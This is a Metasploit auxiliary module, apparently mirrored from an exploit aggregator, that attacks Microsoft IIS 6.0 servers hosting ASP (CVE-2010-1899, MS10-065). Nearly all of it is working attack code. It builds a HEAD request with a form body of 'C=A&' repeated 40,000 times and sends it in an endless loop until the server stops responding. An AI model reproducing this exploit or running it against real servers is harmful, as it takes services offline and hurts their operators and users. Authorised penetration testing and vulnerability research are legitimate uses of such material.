## https://sploitus.com/exploit?id=PACKETSTORM:180584
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',
'Description' => %q{
The vulnerability allows remote unauthenticated attackers to force the IIS server
to become unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads
out a Post Form value.
},
'Author' =>
[
'Heyder Andrade <heyder[at]alligatorteam.org>',
'Leandro Oliveira <leadro[at]alligatorteam.org>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
[ 'EDB', '15167' ]
],
'DisclosureDate' => '2010-09-14'))
register_options(
[
Opt::RPORT(80),
OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),
OptString.new('URI', [ true, 'URI to request', '/page.asp' ])
])
end
def run
uri = datastore['URI']
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")
begin
while(1)
begin
connect
payload = "C=A&" * 40000
length = payload.size
sploit = "HEAD #{uri} HTTP/1.1\r\n"
sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
sploit << "Connection:Close\r\n"
sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
sploit << "Content-Length:#{length} \r\n\r\n"
sploit << payload
sock.put(sploit)
#print_status("DoS packet sent.")
disconnect
rescue Errno::ECONNRESET
next
end
end
rescue Errno::EPIPE
print_good("IIS should now be unavailable")
end
end
end